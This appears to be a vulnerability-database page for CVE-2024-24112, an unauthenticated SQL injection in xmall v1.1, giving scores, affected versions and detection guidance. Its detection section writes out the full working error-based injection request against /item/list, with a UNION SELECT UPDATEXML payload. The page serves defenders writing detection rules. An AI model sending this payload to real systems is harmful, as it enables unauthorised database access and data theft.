cbcvebase.
CVE-2024-24112
published 2024-02-06

CVE-2024-24112: xmall v1.1 was discovered to contain a SQL injection vulnerability via the orderDir parameter.

PriorityP260critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
3.35%
87.2th percentile
xmall v1.1 was discovered to contain a SQL injection vulnerability via the orderDir parameter.

Affected

1 ranges
VendorProductVersion rangeFixed in
exrickxmall

Detection & IOCsextracted from sources · hover to see the quote

url/item/list?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=desc)a+union+select+updatexml(1,concat(0x7e,{{md5(num)}},0x7e),1)%23;&start=0&length=1&search%5Bvalue%5D=&search%5Bregex%5D=false&cid=-1&_=1
path/item/list
commanddesc)a+union+select+updatexml(1,concat(0x7e,<md5>,0x7e),1)%23
otherapp="XMall-后台管理系统"
  • Response body contains both the MD5 hash of the random integer and the string 'MySQLSyntaxErrorException', indicating successful SQL injection error-based exploitation via the orderDir parameter.
  • The vulnerable endpoint is GET /item/list; the injection point is the order[0][dir] parameter (URL-encoded as order%5B0%5D%5Bdir%5D). Payloads break out of the ORDER BY clause using a closing parenthesis followed by a UNION SELECT with UPDATEXML for error-based data extraction.
  • The vulnerability is unauthenticated (PR:N) and network-reachable (AV:N); no session cookie or authentication token is required to trigger the SQL injection.
  • HTTP response status 200 is returned even on successful exploitation; detection should not rely on error-level HTTP status codes.
  • ·The exploit uses a randomly generated integer (rand_int 9000000–9999999) whose MD5 hash is embedded in the payload and matched in the response body, making each probe unique. Static signatures must account for this dynamic component.
  • ·Affected version is specifically XMall v1.1; the CPE is cpe:2.3:a:exrick:xmall:1.1:*:*:*:*:*:*:*. Detections should be scoped to this version.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vendor_oracle8.1HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.